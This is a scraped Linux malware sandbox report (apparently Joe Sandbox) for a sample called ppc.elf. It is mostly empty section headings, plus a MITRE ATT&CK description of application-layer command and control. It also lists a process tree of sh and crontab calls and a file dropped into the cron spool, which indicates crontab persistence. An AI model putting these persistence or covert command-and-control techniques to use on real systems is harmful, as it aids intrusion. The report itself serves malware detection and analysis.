Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report ppc.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/var/spool/cron/crontabs/tmp.mMQot8

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

System Behavior

Analysis Process: ppc.elf PID: 6232, Parent PID: 6156

General

Chronological Activities

Analysis Process: ppc.elf PID: 6234, Parent PID: 6232

General

Chronological Activities

Analysis Process: sh PID: 6234, Parent PID: 6232

General

Chronological Activities

Analysis Process: sh PID: 6240, Parent PID: 6234

General

Chronological Activities

Analysis Process: sh PID: 6242, Parent PID: 6240

General

Chronological Activities

Analysis Process: crontab PID: 6242, Parent PID: 6240

General

Chronological Activities

Analysis Process: sh PID: 6241, Parent PID: 6234

General

Chronological Activities

Analysis Process: crontab PID: 6241, Parent PID: 6234

Linux Analysis Report
ppc.elf